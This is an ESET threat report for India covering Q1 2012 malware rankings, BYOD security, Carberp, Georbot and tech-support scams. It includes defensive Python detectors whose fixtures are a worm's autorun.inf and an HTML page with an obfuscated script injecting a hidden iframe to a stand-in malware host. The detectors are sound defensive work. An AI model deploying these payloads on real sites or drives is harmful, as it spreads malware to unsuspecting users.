eset india cyber threat trends report q1
Post on 20-Oct-2014
ESET Cyber Threat Trend Report. India & Globe
Quarter I, 2012
Table of Contents
THE TOP TEN THREATS IN INDIA, QUARTER I, 2012
TOP THREATS (INDIA) IN BRIEF
THE TOP TEN THREATS (GLOBAL)
TOP THREATS (GLOBAL) IN BRIEF
SIZING UP THE BYOD SECURITY CHALLENGE
WIN32/CARBERP GANG ON THE CARPET
CARBERP: THE RUSSIAN TROJAN BANKER NOW AIMS AT FACEBOOK USERS
FROM GEORGIA WITH LOVE: WIN32/GEORBOT INFORMATION STEALING TROJAN AND BOTNET
FAKE SUPPORT, AND NOW FAKE PRODUCT SUPPORT
SUPPORT SCAMMERS (MIS)USING INF AND PREFETCH
RECENT ESET PUBLICATIONS IN INDIA
ABOUT ESET
ADDITIONAL RESOURCES
The Top Ten Threats in India, Quarter I, 2012
TOP Threats (India) in brief:
1. INF/Autorun.gen.
A detection for 'autorun.inf' files that may be used by worms when
spreading to local, network, or removable drives.
When copying themselves to a drive, these worms also create a file
named 'autorun.inf' in the root of the targeted drive. The
'autorun.inf' file contains execution instructions for the operating
system which are invoked when the drive is viewed using Windows
Explorer, thus executing the copy of the worm.
2. HTML/ScrInject.B.Gen
Generic detection of HTML web pages containing obfuscated script or
iframe tags that automatically redirect the browser to a malware
download.
3. Win32/Sality
Sality is a polymorphic file infector. When run, it starts a service and
creates or deletes registry keys related to security software on the
system, and registers itself so that the malicious process is started on
every reboot of the operating system.
It infects EXE and SCR files and disables services and processes
belonging to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah
4. Win32/Ramnit.A.
Win32/Ramnit.A is a file infector. Files are infected by adding a new
section that contains the virus. The virus acquires data and
commands from a remote computer or the Internet. It can execute
the following operations: capture screenshots, send gathered
information, download files from a remote computer and/or the
Internet, run executable files, shut down/restart the computer.
5. LNK/Autostart.A
LNK/Autostart.A (Microsoft's name for the same thing is
Exploit:Win32/CplLnk.A) is a generic detection for specially crafted,
malicious shortcut (.lnk) files that exploit the Windows Shell
shortcut-icon vulnerability (CVE-2010-2568, fixed in MS10-046) first seen
in the wild with the Win32/Stuxnet family. When a user browses a folder
that contains the malicious shortcut using an application that displays
shortcut icons, Windows loads the DLL the shortcut points to while
rendering the icon, so the malware runs without the user clicking anything.
6. INF/Autorun
This detection label is used to describe a variety of malware using the
file autorun.inf as a way of compromising a PC. This file contains
information on programs meant to run automatically when
removable media
(often USB flash drives and similar devices) are accessed by a
Windows PC user. ESET security software heuristically identifies
malware that installs or modifies autorun.inf files as INF/Autorun
unless it is identified as a member of a specific malware family.
7. HTML/Iframe.B
HTML/Iframe.B is a generic detection of malicious IFRAME tags
embedded in HTML pages, which redirect the browser to a specific
URL location hosting malicious software.
8. Win32/Autoit
Win32/Autoit is a worm that spreads via removable media; some of its
variants also spread through MSN Messenger. It may arrive on a system as
a file downloaded from a malicious web site, or it may be dropped by
other malware. After infecting a system, it searches for executable
files and replaces them with copies of itself, and it copies itself to
local disks and network shares. Once executed, it downloads additional
threats or new variants of itself.
9. Win32/Toolbar.Babylon
ESET classifies this class of threats as PUA (potentially unwanted
application). A potentially unwanted application is a program that
contains adware, installs toolbars or has other unclear objectives. There
are some situations where a user may feel that the benefits of a
potentially unwanted application outweigh the risks. For this reason,
ESET assigns PUAs a lower-risk category than other types of malicious
software, such as trojan horses or worms. While installing your ESET
security software, you can decide whether to enable detection of
potentially unwanted applications.
10. Win32/Virut.NBP
Win32/Virut.NBP is a polymorphic file infector. The virus connects to
the IRC network. It can be controlled remotely. The virus searches for
executables with one of the following extensions: .exe, .scr.
Executables are infected by appending the code of the virus to the
last section. The host file is modified in a way that causes the virus to
be executed prior to running the original code.
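Items 1 (INF/Autorun.gen) and 6 (INF/Autorun) above both come down to what an autorun.inf in a drive root tells Windows to run. The script below is an added example, not ESET's detection logic: it parses the [autorun] section and flags the markers that separate a worm's autorun.inf (every verb pointing at an executable hidden in a fake recycle-bin folder, an 'action' string copying Windows' own AutoPlay prompt, a borrowed folder icon) from an installer's. The two sample files, the SID-named folder and the scoring thresholds are constructed for this example.

```python
"""Triage an autorun.inf recovered from the root of a removable drive.

Added example, not ESET's INF/Autorun detection. The directive names
(open, shellexecute, shell\\<verb>\\command, icon, action, label) are the
documented autorun.inf keys; the heuristics for telling a worm's file from
an installer's are this example's own assumptions.
"""
import configparser
import re
from typing import Dict, List

# Constructed sample of the kind of autorun.inf an Autorun worm drops.
WORM_SAMPLE = """\
[autorun]
open=RECYCLER\\S-1-5-21-1482476501-1644491937-682003330-1013\\xdmtt.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
shell\\open=Open
shell\\open\\Command=RECYCLER\\S-1-5-21-1482476501-1644491937-682003330-1013\\xdmtt.exe
shell\\explore\\Command=RECYCLER\\S-1-5-21-1482476501-1644491937-682003330-1013\\xdmtt.exe
UseAutoPlay=1
"""

# Constructed sample of a benign autorun.inf from an installer CD.
INSTALLER_SAMPLE = """\
[AutoRun]
open=setup.exe
icon=setup.exe,0
label=Product Installer
"""

LAUNCH_KEYS = ("open", "shellexecute")                 # directives that start a program
VERB_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$")  # shell\<verb>\command
# Folders worms favour because Explorer hides them by default.
HIDDEN_DIR_RE = re.compile(
    r"(^|\\)(recycler|recycled|\$recycle\.bin|system volume information)(\\|$)", re.I)
# Text that copies Windows' own "Open folder to view files" AutoPlay entry.
FOLDER_PROMPT_RE = re.compile(r"open folder|view files", re.I)


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section with lower-cased keys.

    Section and key names are case-insensitive in autorun.inf; interpolation
    is disabled so a literal '%SystemRoot%' does not trip configparser.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return dict(cp.items(section))
    return {}


def launch_targets(directives: Dict[str, str]) -> List[str]:
    """Every distinct file the autorun.inf can make Windows execute."""
    targets = {v for k, v in directives.items()
               if k in LAUNCH_KEYS or VERB_COMMAND_RE.match(k)}
    return sorted(targets)


def assess(text: str) -> Dict[str, object]:
    """Verdict: 'clean' (launches nothing), 'review' (launches code but shows
    none of the deception markers), 'malicious' (two or more markers)."""
    d = parse_autorun(text)
    targets = launch_targets(d)
    findings: List[str] = []
    for verb in ("open", "explore"):
        key = f"shell\\{verb}\\command"
        if key in d:   # double-click or Explore on the drive runs this instead
            findings.append(f"{key} replaces Explorer's own '{verb}' verb: {d[key]}")
    for t in targets:
        if HIDDEN_DIR_RE.search(t):
            findings.append(f"launch target hidden in a recycle-bin/system folder: {t}")
    if FOLDER_PROMPT_RE.search(d.get("action", "")):
        findings.append(f"'action' text mimics the AutoPlay folder prompt: {d['action']}")
    if "shell32.dll" in d.get("icon", "").lower():
        findings.append("icon borrowed from shell32.dll so the drive looks like a folder")
    if len(findings) >= 2:
        verdict = "malicious"
    elif targets:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "targets": targets, "findings": findings}


if __name__ == "__main__":
    for name, sample in (("worm", WORM_SAMPLE), ("installer", INSTALLER_SAMPLE)):
        result = assess(sample)
        print(f"{name}: {result['verdict']}")
        for f in result["findings"]:
            print("  -", f)
```

The 'review' verdict is deliberate: an installer's `open=setup.exe` is exactly the behaviour the worm abuses, so a file that launches anything from removable media deserves a look even when none of the deception markers are present.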
The Top Ten Threats (Global), March 2012
TOP Threats (Global) in brief:
1. HTML/ScrInject.B (see above)
2. INF/Autorun (see above)
3. HTML/Iframe.B
HTML/Iframe.B is generic detection of malicious IFRAME tags
embedded in HTML pages, which redirect the browser to a specific URL
location with malicious software.
4. Win32/Conficker
The Win32/Conficker threat is a network worm originally propagated
by exploiting a vulnerability in the Windows Server service (MS08-067,
CVE-2008-4250). The vulnerability is in the RPC sub-system and can be
exploited remotely by an attacker without valid user credentials.
Depending on the variant, it may also spread via unsecured shared folders
and via removable media, making use of the Autorun facility enabled by
default on older Windows versions (though not in Windows 7).
Win32/Conficker loads a DLL through the svchost process. This threat
contacts web servers with pre-computed domain names to download
additional malicious components. Fuller descriptions of Conficker
variants are available at
http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.
5. JS/Agent
The trojan displays dialogs that ask the user to purchase a specific
product/service. After the product/service is purchased, the malware
removes itself from the computer. The trojan is probably part of other
malware.
6. JS/Iframe.AS
JS/Iframe.AS is a trojan that redirects the browser to a specific URL
location with malicious software. The program code of the malware is
usually embedded in HTML pages.
7. Win32/Sirefef
Win32/Sirefef.A is a trojan that redirects results of online search
engines to web sites that contain adware.
8. Win32/Sality (see above)
9. Win32/Dorkbot
Win32/Dorkbot.A is a worm that spreads via removable media. The
worm contains a backdoor and can be controlled remotely. The file is
run-time compressed using UPX.
The worm collects login user names and passwords when the user
browses certain web sites, then attempts to send the gathered
information to a remote machine.
10. JS/Redirector
JS/Redirector is a trojan that redirects the browser to a specific URL
location with malicious software. The program code of the malware is
usually embedded in HTML pages.
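HTML/ScrInject.B, HTML/Iframe.B, JS/Iframe.AS and JS/Redirector (in both lists above) are generic detections for one pattern: a page carrying a hidden IFRAME, or a script that decodes and writes one, to pull the browser to a malware host. The scanner below is an added example, not ESET's signatures. It shows the two sides of that detection on a constructed page: frames that are one pixel large or pushed off-screen by inline CSS, and inline scripts that eval() decoded text or contain long runs of percent/hex escapes. The sample page, the host example.invalid and the thresholds are this example's own.

```python
"""Flag hidden iframes and obfuscated inline scripts in an HTML document.

Added example, not ESET's HTML/Iframe.B or HTML/ScrInject.B signatures.
The sample page, the example.invalid host and the thresholds (one-pixel
frames, eight or more consecutive hex escapes) are constructed.
"""
import re
from html.parser import HTMLParser
from typing import List, Tuple

Finding = Tuple[str, str, str]  # (kind, where, reason)

# Constructed page: one legitimate embed, one injected script that decodes
# and writes a 1x1 frame, and two frames hidden by size and by CSS.
SAMPLE_PAGE = """<html><head><title>Welcome</title>
<script src="/js/site.js"></script>
<script>
var s = unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E");
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29"));
</script>
</head><body>
<h1>Our site</h1>
<iframe src="https://example.invalid/video" width="640" height="360"></iframe>
<iframe src="http://example.invalid/counter.php" width="1" height="1"></iframe>
<iframe src="http://example.invalid/in.php" style="position:absolute;left:-9999px"></iframe>
</body></html>"""

TINY_RE = re.compile(r"^\s*[01]\s*(px)?\s*$", re.I)          # 0 or 1 pixel
HIDDEN_CSS_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}", re.I)

SCRIPT_RULES = [
    (re.compile(r"\beval\s*\(\s*(unescape|String\.fromCharCode|decodeURIComponent)\b", re.I),
     "eval() of decoded text"),
    (re.compile(r"(%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u00[0-9a-f]{2}){8,}", re.I),
     "long run of hex-escaped characters"),
    (re.compile(r"String\.fromCharCode\s*\((\s*\d+\s*,){10,}", re.I),
     "decodes a character-code array"),
    (re.compile(r"document\.write(ln)?\s*\([^)]*iframe", re.I | re.S),
     "document.write() of an iframe"),
]


class InjectScanner(HTMLParser):
    """Collects hidden iframes and inline scripts matching SCRIPT_RULES."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: List[Finding] = []
        self._in_script = False
        self._script: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # valueless attributes come back as None
        if tag == "iframe":
            reasons = []
            if TINY_RE.match(a.get("width", "x")) or TINY_RE.match(a.get("height", "x")):
                reasons.append("zero/one-pixel frame")
            if HIDDEN_CSS_RE.search(a.get("style", "")):
                reasons.append("hidden by inline CSS")
            if reasons:
                self.findings.append(("iframe", a.get("src", ""), "; ".join(reasons)))
        elif tag == "script":
            self._in_script = True
            self._script = []

    def handle_data(self, data):
        if self._in_script:              # HTMLParser hands script bodies over verbatim
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script)
            reasons = [why for rule, why in SCRIPT_RULES if rule.search(body)]
            if reasons:
                snippet = " ".join(body.split())[:60]
                self.findings.append(("script", snippet, "; ".join(reasons)))


def scan(page: str) -> List[Finding]:
    """Return every hidden iframe and obfuscated inline script in the document."""
    p = InjectScanner()
    p.feed(page)
    p.close()
    return p.findings


if __name__ == "__main__":
    for kind, where, reason in scan(SAMPLE_PAGE):
        print(f"{kind:7} {reason:50} {where}")
```

Note what the scanner does not see: the frame the injected script writes only exists after the script runs, so static inspection catches the script, not the frame; and a frame hidden by a stylesheet or by a parent element's style rather than its own style attribute is missed. Both gaps are why vendors pair this kind of generic signature with behavioural and URL-reputation checks.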
Threats India vs Globe (January, February, March 2012)
Sizing Up the BYOD Security Challenge
Stephen Cobb, ESET Security Evangelist
On the plus side of BYOD, you may get more work from people when they
can work in more places and at more times of the day (from the
breakfast table in the morning to the kitchen table at night and the
coffee shop in between). There can be cost savings too: equipment
outlays can be reduced if employees use their own devices instead of
the company buying them.
At the same time, IT security managers must weigh those
benefits against the security risks that come with these devices,
plus the cost of bringing them into line with existing security
policies and compliance standards. For example, what are the legal
ramifications of an employee’s personal laptop going missing when
it contains your customer list or sensitive internal
correspondence? To help companies get a handle on the scale and
scope of these risks, ESET engaged Harris Interactive to survey
some 1,300 adults in America who are currently employed. We
found more than 80 percent of them “use some kind of personally
owned electronic device for work-related functions.” Many of
these devices are older technologies like laptop and desktop
computers, but smartphones and tablets are already a significant
part of the BYOD phenomenon.
Unfortunately, the survey paints a worrying picture of security
on these devices; for example, encryption of company data is only
happening on about one third of them. One third of those
surveyed responded that company data is not encrypted when it is
on their personal devices and the remaining third did not know
one way or the other, which is worrying in itself. You can see more
of the findings in the accompanying infographic.
One particular area of concern is small devices—like tablets
and smartphones—that are easier to steal than laptops and
desktops but pack tremendous processing, storage, and
communication capabilities. Consider the Microsoft Word
document in which the results of ESET’s BYOD survey were
presented. This file takes up 170 kilobytes of storage space and
contains 17 pages of charts, tables, and text that summarize the
most important findings from this not inexpensive research. That
means you could easily store more than 70,000 similar reports on a
16-gigabyte smartphone or microSD card. A smartphone could transmit
all 70,000 documents to the other side of the world in a matter of
minutes on a WiFi or 4G/LTE connection (the latter could prove costly,
but the recipient might be happy to pay the data overage).
So it is not good news to learn that only 25 percent of
smartphone users, and less than 10 percent of tablet users, say
they have enabled auto-locking on these devices (the feature that
locks the device after a period of inactivity and requires a
password or code to unlock). Overall, we found that less than half
of all devices in the BYOD category are protected by basic security
measures. On the bright side, BYOD security could be boosted
cheaply and quickly if companies did the following:
Mandate auto-locking with password protection on all
devices.
Enable remote lock/wipe to protect data on any
stolen devices.
Enable encryption of company data on all devices.
Make sure up-to-date anti-malware protection is
active on all devices.
In summary, now would be a good time to check how your
company is handling BYOD security. With roughly two thirds of our
survey respondents reporting that their employer had not yet
implemented a BYOD policy, or provided any security training,
those would be good places to start.
Win32/Carberp Gang on the Carpet
On March 20, Group-IB, ESET's partner in Russia providing
comprehensive investigation of IT security incidents and breaches of
information security, announced the results of its joint investigation
with the Federal Security Service (FSB) and the Ministry of the Interior
(MVD) of Russia, resulting in the arrest of a gang of eight accused of
offences under the Russian Federation's Criminal Code including
larceny, creation and distribution of malicious software, and
unauthorized access to computer information. The fraudsters were
engaged in online banking fraud affecting the clients of over a hundred
banking institutions worldwide within the last two years. The group
managed to steal over 130 million rubles in a single quarter.
Group-IB has identified them as using Win32/Carberp and
Win32/RDPdoor in pursuit of criminal profit, going beyond stealing
banking credentials and plundering bank accounts to DDoS (Distributed
Denial of Service) attacks.
It's been suggested that if convicted, they can expect sentences
of up to 10 years. The investigation of the botnet and its servers,
obtained as a result of interaction with specialized organizations
in various countries, including Holland and Canada, helped
prevent theft of funds from clients of over a hundred banking
institutions worldwide.
For the first time in international practice it was possible to
establish the entire criminal chain, including the head of this
group and owner of a botnet, those conducting fraudulent
transactions, and those directly involved in cashing the stolen
funds. In all, a total of eight individuals comprised the group. It
should be noted that in addition to stealing funds from bank
accounts, the criminals were also involved in carrying out
distributed denial of service (DDoS) attacks.
The criminals hacked websites heavily used by accountants in their
work, as well as popular news media websites and online stores,
infecting them with malware. Having established remote access to the
computer of a potential victim, and having detected online banking
details on that computer, the criminals created a fraudulent payment
order to transfer funds to a specially prepared account. The stolen
funds were then cashed out via bank cards issued to front individuals
or legal entities. To have a comfortable working environment, the
criminals opened an office operating under the cover of a data
recovery company.
“Our experts did an enormous amount of work, which resulted in
identifying the head of this criminal group, the owner and
operator of a specialized banking botnet, identifying the control
servers, and identifying the directing of traffic from popular
websites in order to spread malware infection,” noted Ilya
Sachkov, Group-IB CEO, in the company's press release. “The
investigations conducted by our Forensics Lab confirmed the use
of the Win32/Carberp and Win32/RDPdoor malware by the
criminals in order to carry out theft of funds.”
ESET whitepaper on Win32/Carberp is available here:
http://go.eset.com/us/resources/white-papers/carberp.pdf .
Carberp: the Russian Trojan banker now aims at Facebook users
David Harley and a Russian research colleague, Aleksandr Matrosov, explain that the most widely spread banking trojan in Russia is now trying to steal money from Facebook users.
ESET researchers noted that Win32/Carberp used bootkit
components from malware called Rovnix, which was also the
subject of scrutiny in February.
The article covers the following aspects of this threat:
Fake Facebook Lockout
Demanding e-Cash
Faking Facebook
Web-Injects
Carberp Detection in Russia
Global infection statistics
Bypassing DDoS Prevention Systems
The complete description can be read in Facebook Fakebook: New
Trends in Carberp Activity.
A related post, Rovnix Reloaded: new step of evolution, explains
the new developments of this threat. It is detected as the
Win32/Rovnix.B trojan and appears to be the first bootkit to
employ VBR (Volume Boot Record) infection.
From Georgia With Love: Win32/Georbot information stealing trojan and botnet
by Righard Zwienenberg, Senior Research Fellow
Malicious software that gets updates from a domain belonging to the
Eurasian state of Georgia? This unusual behavior caught the attention
of an analyst in ESET's virus laboratory earlier this year, leading to
further analysis which revealed an information stealing trojan being
used to target Georgian nationals in particular. After further
investigation, ESET researchers were able to gain
access to the control panel of the botnet created
with this malware, revealing the extent and the
intent of this operation.
Finding a new botnet is not unusual these days and most are not
particularly interesting from a nerdy, techie point of view, but it
turns out that this one (dubbed Win32/Georbot) is both unusual and
interesting. Amongst other activities, it will try to steal documents
and certificates, can create audio and video recordings and browse the
local network for information. One unusual aspect is that it also looks
for Remote Desktop configuration files (.rdp files), which let whoever
receives them connect to the remote machines without using any exploit.
That approach even bypasses the need for RDP exploits such as the one
that was revealed last week (MS12-020).
Win32/Georbot features an update mechanism to get new versions
of the bot as an attempt to remain undetected by anti-malware
scanners. The bot also has a fall-back mechanism in case it can’t reach
the C&C (Command and Control) server: in that case it will then
connect to a special webpage that was placed on a system hosted by
the Georgian government. This does not
automatically mean that the Georgian
government is involved. Quite often people are
not aware their systems are compromised. It
should be also noted that the Data Exchange
Agency of the Ministry of Justice of Georgia and
its national CERT were fully aware of the
situation as early as 2011 and, parallel to their
own – still ongoing – monitoring, have
cooperated with ESET on this matter.
Win32/Georbot uses various obfuscation techniques to make static
analysis more difficult, but for experienced malware analysts that is
not much of a problem to overcome, and Win32/Georbot was well
worth the time it took to undertake a detailed analysis. The full white
paper containing the detailed analysis is available as a PDF file.
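The point about Remote Desktop configuration files deserves a concrete check, because it is the cheapest of the bot's capabilities to defend against. The script below is an added example, not part of ESET's Georbot analysis: it parses .rdp files in the 'name:type:value' form mstsc.exe writes and reports what an attacker would gain from a stolen copy. The key names used ('full address', 'username', 'password 51', 'prompt for credentials', 'redirectdrives', 'drivestoredirect') are the ones Remote Desktop Connection itself writes; the two sample files are constructed, and the bytes after 'password 51:b:' are a stand-in rather than a real ciphertext. One caveat the example encodes: a saved 'password 51' blob is DPAPI-encrypted under the owning user's profile, so a file copied off the machine is not immediately usable, but malware running in that user's session can decrypt it, which is exactly the position a bot like Georbot is in.

```python
"""Audit Remote Desktop Connection (.rdp) files for saved credentials.

Added example, not part of ESET's Win32/Georbot analysis. Key names are the
ones mstsc.exe writes; the two sample files are constructed. A 'password 51'
blob is DPAPI-encrypted under the owning user's profile: copying the file
elsewhere does not expose the password, but code running as that user can
decrypt it, which is the scenario an RDP-file-stealing bot exploits.
"""
import os
from typing import Dict, Iterator, List, Tuple

# Constructed: a connection saved with "Remember my credentials". The hex
# after 'password 51:b:' is a placeholder, not a real DPAPI ciphertext.
RDP_SAVED_PASSWORD = """\
screen mode id:i:2
full address:s:fileserver.corp.example:3389
username:s:CORP\\jsmith
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB0102030405060708
prompt for credentials:i:0
redirectdrives:i:1
drivestoredirect:s:*
"""

# Constructed: same host, but the user is prompted for a password every time.
RDP_PROMPTING = """\
screen mode id:i:2
full address:s:fileserver.corp.example:3389
username:s:CORP\\jsmith
prompt for credentials:i:1
"""


def parse_rdp(text: str) -> Dict[str, Tuple[str, str]]:
    """Parse 'name:type:value' lines; type is s (string), i (int) or b (binary hex).

    Only the first two colons split fields, so 'host:3389' in the value survives.
    """
    settings: Dict[str, Tuple[str, str]] = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3 and parts[1] in ("s", "i", "b"):
            settings[parts[0].lower()] = (parts[1], parts[2])
    return settings


def audit_rdp(text: str) -> Dict[str, object]:
    """Report what a thief gains from this file alone: target, account, severity."""
    s = parse_rdp(text)

    def value(key: str) -> str:
        return s.get(key, ("", ""))[1]

    findings: List[str] = []
    target = value("full address")
    user = value("username")
    saved_pw = value("password 51") != ""
    if saved_pw:
        findings.append("saved password (DPAPI blob) - usable by code running as this user")
    if user and value("prompt for credentials") == "0":
        findings.append("no credential prompt on connect")
    if value("redirectdrives") == "1" or value("drivestoredirect") == "*":
        findings.append("local drives are shared into the remote session")
    if saved_pw:
        severity = "high"     # file + user context = working logon
    elif user:
        severity = "medium"   # host and account name, password still needed
    else:
        severity = "low"
    return {"target": target, "username": user, "severity": severity, "findings": findings}


def find_rdp_files(root: str) -> Iterator[str]:
    """Yield every *.rdp under root (mstsc saves them in the user's Documents)."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".rdp"):
                yield os.path.join(dirpath, name)


def read_rdp_file(path: str) -> str:
    """mstsc.exe writes UTF-16 with a BOM; hand-made files may be ANSI."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


if __name__ == "__main__":
    for path in find_rdp_files(os.path.expanduser("~")):
        report = audit_rdp(read_rdp_file(path))
        print(f"{report['severity']:6} {path} -> {report['target']} as {report['username']}")
        for f in report["findings"]:
            print("        ", f)
```

Run on a user's profile, the 'high' results are the files whose theft turns into an exploit-free logon; the fix is to untick "Remember my credentials" (or set 'prompt for credentials:i:1') and, for administrative hosts, to rely on a jump host or gateway rather than credentials cached on endpoints.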
Fake Support, And Now Fake Product Support
David Harley, Senior Research Fellow
There's a blog article I've been wanting to write for a few days, but
haven't so far been able to make time for. However, Martijn Grooten
drew my attention to a blog on much the same topic from our friends at
Avast! and one of ESET's partners alerted me to a very relevant and
related post by Brian Krebs, so I've pushed it to the top of the stack.
I first became aware of the plague of Indian companies operating PC
and anti-virus support scams because one of our competitors advised
me that one of them was apparently carrying out unethical marketing
on ESET's behalf. (They weren't, of course, anything to do with ESET:
see this blog series and this paper.)
I recently learned from my colleagues at ESET UK that cold-callers
from Mumbai have developed a new twist on this cold-calling scam,
calling people in the UK and apparently claiming to offer paid support in
response to problems that don't exist, because, they claim, "ESET
doesn't offer free support." (Don't panic! For genuine ESET customer
support, there are contact details on the web page for the ESET partner
or distributor responsible for the region in which you live. In India ESET
obviously provides support to all customers; the contacts are the
following: www.esetindia.com, https://www.facebook.com/esetindia,
Toll Free Phone 1800-209-1999).
It appears from a recent Avast! blog that Avast! customers are suffering
a similar experience, 'receiving phone calls from “Avast customer
service” reps who need to take control of their computer to resolve
some issue and who, for a fee, wish to charge them for this privilege.'
Unfortunately, according to Brian Krebs, "users are reporting that the
incidents followed experiences with iYogi, the company in India that is
handling Avast’s customer support." (The relationship is confirmed by
an Avast! blog here.)
While someone describing himself as the co-founder and president of
marketing at iYogi has strongly denied any connection with the usual
gang of out-and-out scammers, the use, as described by Krebs, of the
Event Viewer ploy characteristic of Indian support scams means that
iYogi is going to have to work hard to prove its innocence. My guess is
that if Avast!, a company with an excellent reputation previously,
discovers that iYogi is indeed operating on the side of the non-angels,
heads – and outsourcing contracts – will roll.
Support services for anti-virus products obviously vary according to
vendor and product. Free one-to-one support may not be available for
free products, and other support may range from free but basic, to
cattle-class, to business class or de luxe. However, reputable security
companies do have standards that should apply at all points on the
spectrum:
They don't make unsolicited phone calls to tell you about viruses you
don't have. Sorry, but I can't guarantee that you won't get
marketing calls but they should be within acceptable legal and
ethical boundaries, and that doesn't include pretending to see
malware on a system they don't have access to.
They won't use nasty semi-fraudulent techniques to "prove"
you have a virus problem like telling you that Event Viewer, or
ASSOC (the CLSID trick described here), or "Prefetch virus" or
INF is listing malicious files. (Those last two tricks are
now summarized in a separate blog article here.)
If you're subscribed to some form of premium package that
attracts a subscription rate, they're not likely to try to gouge
even more cash or financial data out of you by ringing you up to
scare you to death.
They won't try to get direct access to your system using free versions
of commercial remote access software so that they can upload
various free/limited-functionality security packages: if a
professional AV company needs access to your machine, they
won't do it by misusing free licences for another company's
software.
Unless, of course, they partner with a support organization that doesn't
see the difference between legitimate marketing and outright
misrepresentation and fraud. If Avast! has, in fact, fallen into that trap,
they have my sincere sympathy. But it will be hard for them to recover
from that misstep, and the reputation of the rest of the AV industry has
also taken a blow. We can only hope that some good will come out of
this, like real progress on effective legal action against support scams.
Paying for third-party support for a free product may sound like a good
idea in principle, since AV companies don't normally offer one-to-one
support for free products. But it's generally safer to upgrade to a
paid version, especially if you already suspect that you have malware on
your system. The problem here is that sometimes people don't get AV
until they have a problem, and at that point, saving money with a free
solution may be a false economy.
Cold-calling (or spamming support forums) to offer paid support for
products that already offer free support to paying customers may not
sound particularly ethical (well, it doesn't to me). Worse, it may actually
cause damage to your system which may even, depending on the
vendor and the actual circumstances, compromise your ability to
get the legitimate support you've already paid for. But it isn't
necessarily fraudulent. (Or illegal, though it may go against privacy
legislation covering "Do Not Call" lists, for example, though if the Krebs
story is correct, the existence of a pre-existing support relationship may
be used to get round that. And unfortunately, cold-callers from India
tend to ignore local do-not-call lists: in fact, some legitimate companies
seem to be taking advantage of offshored support to bypass such lists.)
But if the call is made on the basis of reports of malware that you don't
have, or at some stage the caller tries to persuade you that utilities like
INF, PREFETCH, ASSOC and EVENTVWR are proof that you have
malware issues, the intent is clearly fraudulent.
Personally, I'd suggest that you regard any unsolicited phone call from a
company claiming to offer antivirus support, even for a product you
actually have, as a probable scam.
Support Scammers (mis)using INF and PREFETCH
David Harley, Senior Research Fellow
There's a quick summary of the PREFETCH and INF ploys I mentioned
above. These are alternatives (or supplements) used by support
scammers from India to the Event Viewer and ASSOC/CLSID ploys also
used to "prove" to a victim that their system is infected with malware or
has other security/integrity problems.
The "Prefetch" command shows the contents of C:\Windows\Prefetch,
containing files used in loading programs.
The "INF" command actually shows the contents of a folder
normally named C:\Windows\Inf: it contains files used in
installing the system.
INF and PREFETCH are legitimate system utilities: so how are
they misused by scammers? By asking a victim to press
Windows-R to get the Run dialogue box, then asking them to
type in something like "prefetch hidden virus" or "inf trojan
malware". When a folder listing like those above appears, the
victim believes that the system is listing malicious files. In fact,
the Run box treats only the first word as the command; everything
after it is passed as arguments, which opening a folder simply
ignores. You could type "inf elvish fantasy" or "prefetch me a gin
and tonic" and you'd get exactly the same directory listing, showing
legitimate files. Neat trick: but don't you fall for it!
Recent ESET publications in India
ESET researchers and speakers are often invited to contribute to other publications, in India and worldwide. Here's a selection of
articles that have appeared in Indian media this quarter.
SME Channels, Mar 28, 2012 ESET’s Caveat Against Sharing Facebook
http://smechannels.com/news/eset-s-caveat-against-sharing-facebook.aspx
EFYtimes.com Employee’s Facebook Passwords Can Be Dangerous For Your Company
http://efytimes.com/e1/80931/Employees-Facebook-Passwords-Can-Be-Dangerous-For-Your-Company
Information Week, April 12, 2012 , Humans and Heuristics: Making people part of information security solutions
http://www.informationweek.in/Security/12-04-12/Humans_and_Heuristics_Making_people_part_of_information_security_solutions.aspx
Business Standard, Jan 23, 2012 Cyber crime is now a booming industry
http://www.business-standard.com/india/news/cyber-crime-is-nowbooming-industry/462549/
PCQuest January 09, 2012 Future Outlook of Cyber Crime & Security
http://pcquest.ciol.com/content/topstories/futureoutlook/2012/112010908.asp
Biztech2.com 18th February, 2012 Cybercrime Predictions 2012
http://biztech2.in.com/blogs/industry-expert/cybercrime-predictions-2012/125402/0
About ESET
Founded in 1992, ESET is a global provider of security solutions for businesses and consumers. ESET’s flagship products ESET NOD32 Antivirus, ESET
Smart Security and ESET Cybersecurity for Mac are trusted by millions of global users. ESET NOD32 Antivirus holds the world record for the number
of Virus Bulletin "VB100” Awards, and has never missed a single “In-the-Wild” worm or virus since the inception of testing in 1998. The Company
has global headquarters in Bratislava (Slovakia), with regional distribution headquarters in San Diego (U.S.), Buenos Aires (Argentina), and
Singapore. ESET has malware research centers in Bratislava, San Diego, Buenos Aires, Prague (Czech Republic), Krakow (Poland), Montreal (Canada),
Moscow (Russia), and an extensive partner network in 180 countries.
In India ESET products are exclusively supplied and supported by "ESS Distribution Pvt Ltd". The sales of ESET products are executed through the
Channel Partners across India.
Additional resources
Keeping your knowledge up to date is as important as keeping your AV updated. For these and other suggested resources please visit the ESET
Threat Center to view the latest:
ESET India Facebook
ESET India Twitter
ESET White Papers
ESET Blog
